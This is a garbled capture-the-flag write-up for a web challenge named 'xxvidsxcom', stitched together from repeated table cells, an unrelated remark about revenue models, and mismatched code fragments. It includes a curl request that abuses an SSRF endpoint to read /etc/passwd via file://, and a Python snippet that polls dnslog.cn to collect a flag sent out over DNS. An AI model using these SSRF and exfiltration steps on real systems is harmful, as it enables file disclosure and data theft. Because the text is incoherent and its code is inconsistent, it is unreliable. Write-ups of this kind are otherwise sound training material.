2021 — Xxvidsxcom

| Item | Description | |------|-------------| | | xxvidsxcom | | Category | Web – Information Disclosure / SSRF / Authentication Bypass | | Points | 250 – 400 (varies by event) | | Goal | Obtain the hidden flag (usually in a file like flag.txt or displayed on an admin page). | | Typical entry point | A public website that offers video streaming / user‑generated content. |

: Exploring how the platform generates revenue (subscriptions, ads, pay-per-view, etc.) can give insight into its business model and sustainability. xxvidsxcom

The source code of the main page revealed a hidden path: /internal/admin/dashboard . It is not reachable from the internet, but we can ask the SSRF to fetch it. | Item | Description | |------|-------------| | |

// allow only mp4, avi $allowed = array('mp4','avi','mov'); if(!in_array($ext,$allowed)) die('Invalid file type'); The source code of the main page revealed

# 3️⃣ Wait a few seconds and pull the DNS log time.sleep(5) log = requests.get("https://dnslog.cn/api/getrecords") print("[*] DNS log response:") print(log.text) # should contain the flag

$ curl -s "https://xxvidsx.com/api/v1/resolve?url=file:///etc/passwd" "status":200

Result: No additional sub‑domains (typical for a small challenge).